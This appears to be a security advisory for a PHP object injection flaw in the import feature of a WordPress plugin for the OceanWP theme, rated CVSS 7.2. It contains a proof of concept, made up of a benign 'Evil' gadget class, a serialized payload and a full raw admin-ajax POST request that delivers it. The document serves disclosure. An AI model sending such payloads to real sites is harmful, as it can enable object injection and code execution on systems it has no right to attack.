7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Create a file named import.dat with the following content: O:4:"Evil":0:{};
Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active)
The view the response of the import request made, which will have the "Arbitrary deserialization" message
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream
O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"
oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"
166c9022e0
-----------------------------371888087213614698033751989022--